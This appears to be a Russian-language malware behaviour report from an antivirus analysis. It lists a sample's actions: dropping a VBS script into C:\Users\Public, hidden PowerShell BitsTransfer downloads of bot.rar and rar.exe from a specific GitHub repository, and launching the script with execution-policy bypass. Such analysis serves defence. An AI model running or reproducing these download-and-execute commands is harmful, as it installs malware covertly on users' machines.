Техническая информация
- <Текущая директория>\123
- <Текущая директория>\123 в C:\users\public\xx.vbs
- 'gi##ub.com':443
- 'gi##ub.com':443
- DNS ASK gi##ub.com
- '<SYSTEM32>\wscript.exe' "C:\Users\Public\xx.vbs"
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' Import-Module BitsTransfer ; Start-BitsTransfer -Source https://github.com/ganzheizen8/testUP/blob/main/1/bot.rar?raw=true -Destination 'C:\Users\Public\bot.rar'' (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' Import-Module BitsTransfer ; Start-BitsTransfer -Source https://github.com/ganzheizen8/testUP/blob/main/rar.exe?raw=true -Destination 'C:\Users\Public\rr.exe'' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /C move /y 123 C:/Users/Public/xx.vbs
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -exec bypass -w hidden start-process C:/Users/Public/xx.vbs